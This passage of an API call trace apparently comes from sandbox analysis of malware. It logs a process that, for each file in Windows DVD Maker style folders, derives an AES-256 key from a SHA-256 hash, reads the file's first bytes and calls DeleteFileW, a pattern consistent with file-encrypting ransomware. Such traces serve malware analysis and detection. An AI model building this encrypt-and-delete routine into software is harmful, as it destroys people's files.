(hHash=0x284d5a8) returned 1 [0141.129] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.129] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.130] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png")) returned 0 [0141.222] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.222] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.222] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.222] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.223] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf63 [0141.223] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.225] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.225] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.225] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.226] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png")) returned 0 [0141.227] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.227] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.227] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.227] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.227] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1197 [0141.227] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.230] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.230] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.230] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.231] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_leftarrow.png")) returned 0 [0141.232] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.232] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.232] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.232] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.232] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11a3 [0141.232] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.235] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.235] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.235] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.236] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_rightarrow.png")) returned 0 [0141.237] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.237] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.237] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.237] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.237] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1068 [0141.237] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.241] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.241] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.241] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.242] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\nav_uparrow.png")) returned 0 [0141.253] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0141.254] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.255] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.255] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.255] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.255] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xab3 [0141.255] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.257] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.257] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.257] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.258] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png")) returned 0 [0141.270] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.271] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.271] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.271] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.271] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8a3 [0141.271] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.273] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.273] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.273] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.274] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png")) returned 0 [0141.275] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.275] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.275] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.275] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.275] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x60f [0141.275] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.301] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.301] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.301] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.302] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png")) returned 0 [0141.352] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.353] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.353] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.353] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.353] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c15 [0141.353] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.356] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.356] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.356] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.358] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png")) returned 0 [0141.358] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.359] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.359] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.359] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.359] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcc1b [0141.359] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.366] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.366] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.366] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.367] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png")) returned 0 [0141.368] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.368] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.368] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.368] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.369] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c432 [0141.369] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.380] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.380] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.380] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.381] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2.wmv")) returned 0 [0141.381] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.382] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.382] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.382] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.382] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2c44a [0141.382] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.435] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.435] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.435] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.436] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_MATTE2_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_matte2_pal.wmv")) returned 0 [0141.472] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.472] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.472] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.472] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.472] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39ef2 [0141.473] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.489] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.489] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.489] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.493] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_rgb6.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6.wmv")) returned 0 [0141.494] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.494] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.494] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.494] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.494] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41c0a [0141.494] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.549] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.549] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.549] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.551] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Bear_Formatted_RGB6_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\bear_formatted_rgb6_pal.wmv")) returned 0 [0141.643] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.644] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.644] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.644] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.644] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdc5 [0141.644] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.646] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.646] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.647] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.648] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-back-static.png")) returned 0 [0141.649] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.649] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.649] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.649] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.649] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdfc [0141.649] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.654] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.654] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.654] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.656] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-next-static.png")) returned 0 [0141.657] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.658] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.658] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.658] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.658] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe0b [0141.658] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.664] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.664] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.664] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.665] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png")) returned 0 [0141.666] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.667] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.667] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.667] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.667] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75d [0141.667] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.707] CryptDestroyHash (hHash=0x284d528) returned 1 [0141.707] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.707] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.708] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png")) returned 0 [0141.752] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.753] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0141.753] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0141.753] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0141.753] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x55f [0141.753] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0141.755] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0141.755] CryptDestroyKey (hKey=0x284d568) returned 1 [0141.755] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0141.757] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png")) returned 0 [0141.758] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0141.758] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: 